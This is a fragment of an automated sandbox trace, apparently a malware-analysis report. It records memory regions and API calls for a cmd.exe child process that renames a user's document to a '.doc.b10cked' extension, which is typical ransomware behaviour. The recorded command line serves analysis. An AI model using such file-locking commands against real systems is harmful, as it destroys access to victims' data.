0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14375 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 14376 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14377 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 203 os_tid = 0xd10 Process: id = "147" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169a0" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14491 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14492 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14493 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14494 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14495 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14496 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14497 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14498 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14499 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14500 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15266 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15267 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15268 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15269 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 15270 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15271 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15272 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15273 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15274 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 
region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15275 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15276 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15277 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15278 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15279 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15300 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 15301 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15302 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15303 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15304 start_va = 
0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15305 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15306 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15307 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 15308 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 15309 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 204 os_tid = 0xcec [0139.460] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa5c | out: lpSystemTimeAsFileTime=0x26fa5c*(dwLowDateTime=0x8d0fbac0, dwHighDateTime=0x1d440a9)) [0139.460] GetCurrentProcessId () returned 0xcf0 [0139.460] GetCurrentThreadId () returned 0xcec [0139.460] GetTickCount () returned 0x2bdb3 [0139.460] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa54 | out: lpPerformanceCount=0x26fa54*=19624928720) returned 1 [0139.461] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.461] __set_app_type (_Type=0x1) [0139.461] __p__fmode () returned 0x76b331f4 [0139.461] __p__commode () returned 0x76b331fc [0139.461] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.461] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.461] GetCurrentThreadId () returned 0xcec [0139.461] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcec) returned 0x38 [0139.461] 
GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.461] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.461] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9ec | out: phkResult=0x26f9ec*=0x0) returned 0x2 [0139.463] VirtualQuery (in: lpAddress=0x26fa23, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.463] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9bc, dwLength=0x1c | out: lpBuffer=0x26f9bc*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0139.463] GetConsoleOutputCP () returned 0x1b5 [0139.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.463] 
SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.466] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.466] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.478] GetEnvironmentStringsW () returned 0x300250* [0139.478] FreeEnvironmentStringsW (penv=0x300250) returned 1 [0139.479] GetEnvironmentStringsW () returned 0x300250* [0139.479] FreeEnvironmentStringsW (penv=0x300250) returned 1 [0139.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e95c | out: phkResult=0x26e95c*=0x40) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x0, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", 
lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x0, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegCloseKey (hKey=0x40) returned 0x0 [0139.479] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e95c | out: phkResult=0x26e95c*=0x40) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x40, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x1, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, 
lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x0, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x9, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x4, lpData=0x26e968*=0x9, lpcbData=0x26e960*=0x4) returned 0x0 [0139.479] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e964, lpData=0x26e968, lpcbData=0x26e960*=0x1000 | out: lpType=0x26e964*=0x0, lpData=0x26e968*=0x9, lpcbData=0x26e960*=0x1000) returned 0x2 [0139.479] RegCloseKey (hKey=0x40) returned 0x0 [0139.479] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.479] srand (_Seed=0x5b88636e) [0139.479] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"" [0139.479] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"" [0139.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3019b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.480] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.480] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.480] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.480] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.480] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.480] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.480] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.480] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.480] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.480] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.480] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.480] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.480] GetEnvironmentStringsW () returned 0x3023a0* [0139.480] FreeEnvironmentStringsW (penv=0x3023a0) returned 1 [0139.480] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.480] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.480] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.480] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.480] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.480] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.481] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.481] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.481] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0139.481] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f728 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.481] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f728, lpFilePart=0x26f724 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f724*="Desktop") returned 0x18 [0139.481] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.481] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4a4 | out: lpFindFileData=0x26f4a4) returned 0x3000e0 [0139.481] FindClose (in: hFindFile=0x3000e0 | out: hFindFile=0x3000e0) returned 1 [0139.481] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f4a4 | out: lpFindFileData=0x26f4a4) returned 0x3000e0 [0139.481] FindClose (in: hFindFile=0x3000e0 | out: hFindFile=0x3000e0) returned 1 [0139.481] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f4a4 | out: lpFindFileData=0x26f4a4) returned 0x3000e0 [0139.481] FindClose (in: hFindFile=0x3000e0 | out: hFindFile=0x3000e0) returned 1 [0139.481] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.481] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.481] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.481] GetEnvironmentStringsW () returned 0x302bc0* [0139.482] FreeEnvironmentStringsW (penv=0x302bc0) returned 1 [0139.482] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.482] GetConsoleOutputCP () returned 0x1b5 [0139.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0139.485] GetUserDefaultLCID () returned 0x409 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f868, cchData=128 | out: lpLCData="0") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f868, cchData=128 | out: lpLCData="0") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f868, cchData=128 | out: lpLCData="1") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.493] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.493] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.494] GetConsoleTitleW (in: lpConsoleTitle=0x2f0960, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0139.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.503] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.503] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.503] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.504] _wcsicmp (_String1="move", _String2=")") returned 68 [0139.504] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0139.504] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0139.504] _wcsicmp (_String1="IF", _String2="move") returned -4 [0139.504] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0139.504] _wcsicmp (_String1="REM", _String2="move") returned 5 [0139.504] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0139.508] GetConsoleTitleW (in: lpConsoleTitle=0x26f560, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.516] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0139.516] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0139.516] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0139.517] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0139.517] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="CD") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="REN") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0139.517] _wcsicmp (_String1="move", _String2="SET") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0139.517] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0139.517] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0139.517] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0139.517] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0139.517] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0139.517] _wcsicmp (_String1="move", _String2="RD") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0139.517] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0139.517] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0139.517] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0139.517] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0139.517] _wcsicmp (_String1="move", _String2="VER") returned -9 [0139.517] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0139.517] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0139.517] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0139.517] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0139.517] _wcsicmp (_String1="move", _String2="START") returned -6 [0139.517] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0139.517] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0139.517] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0139.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.519] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.519] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f31c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f314, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f314*=0x90c08a66, lpMaximumComponentLength=0x0, 